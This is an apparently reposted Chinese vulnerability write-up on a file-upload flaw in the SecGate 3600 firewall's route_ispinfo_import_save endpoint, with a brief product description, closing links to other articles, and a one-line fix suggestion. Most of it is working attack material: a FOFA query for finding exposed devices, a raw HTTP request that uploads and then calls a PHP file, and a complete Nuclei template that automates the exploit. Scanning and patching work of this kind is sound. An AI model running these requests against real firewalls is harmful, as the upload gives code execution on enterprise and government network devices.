网神 SecGate 3600 防火墙 route_ispinfo_import_save 文件上传漏洞

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

网神SecGate 3600防火墙是基于状态检测包过滤和应用级代理的复合型硬件防火墙,是专门面向大中型企业、政府、军队、高校等用户开发的新一代专业防火墙设备,支持外部攻击防范、内网安全、网络访问权限控制、网络流量监控和带宽管理、动态路由、网页内容过滤、邮件内容过滤、IP冲突检测等功能,能够有效地保证网络的安全;产品提供灵活的网络路由/桥接能力,支持策略路由,多出口链路聚合;提供多种智能分析和管理手段,支持邮件告警,支持日志审计,提供全面的网络管理监控,协助网络管理员完成网络的安全管理。

网神SecGate 3600防火墙 route_ispinfo_import_save接口处存在文件上传漏洞,恶意攻击者可能利用此漏洞上传恶意文件,最终导致服务器失陷。

Ⅱ、fofa语句

复制代码
title="网神SecGate 3600防火墙"

Ⅲ、漏洞复现

POC

复制代码
POST /?g=route_ispinfo_import_save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
 
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
 
10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="reqfile"; filename="ceshi.php"
Content-Type: text/plain
 
<?php echo md5('666');unlink(__FILE__);?>
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"
 
route_ispinfo_import_save
------WebKitFormBoundaryJpMyThWnAxbcBBQc--

1、构建poc

2、访问

复制代码
https://127.0.0.1/attachements/ceshi.php

Ⅳ、Nuclei-POC

复制代码
id: SecGate-3600-route-ispinfo-import-save-Upload

info:
  name: 网神SecGate 3600防火墙 route_ispinfo_import_save接口处存在文件上传漏洞,恶意攻击者可能利用此漏洞上传恶意文件,最终导致服务器失陷。
  author: WLF
  severity: high
  metadata: 
    fofa-query: title="网神SecGate 3600防火墙"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /?g=route_ispinfo_import_save HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip, deflate
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
        
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="MAX_FILE_SIZE"
        
        10000000
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="reqfile"; filename="{{filename}}.php"
        Content-Type: text/plain
        
        <?php echo md5('666');unlink(__FILE__);?>
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="submit_post"
        
        route_ispinfo_import_save
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc--

      - |
        GET /attachements/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"fae0b27c451c728867a567e8c1bb4e53")

Ⅴ、修复建议

通过防火墙等安全设备设置访问策略,设置白名单访问

相关推荐
小曹要微笑几秒前
MPU (Memory Protection Unit) 详解(嵌入式系统安全与可靠性的核心守护者)
安全·系统安全
Xの哲學10 分钟前
Linux 指针工作原理深入解析
linux·服务器·网络·架构·边缘计算
Pocker_Spades_A1 小时前
在家搭个私人网盘?用 Nextcloud+cpolar 突破局域网限制
网络
414a1 小时前
LingJing(灵境):Linux Amd64局域网设备访问靶机教程
linux·安全·web安全·网络安全·lingjing·灵境
车载测试工程师1 小时前
CAPL学习-IP API函数-1
网络·学习·tcp/ip·capl·canoe·doip
wasp5202 小时前
做了技术管理后,我发现技术和管理其实可以兼得
java·运维·网络
赖small强3 小时前
【Linux 网络基础】HTTPS 技术文档
linux·网络·https·tls
Black蜡笔小新3 小时前
视频汇聚平台EasyCVR赋能石油管道计量站精准监控与安全管理
安全·音视频
雲烟3 小时前
嵌入式设备EMC安规检测参考
网络·单片机·嵌入式硬件
Token_w4 小时前
openGauss:全密态数据库的金融级安全实践
数据库·安全·金融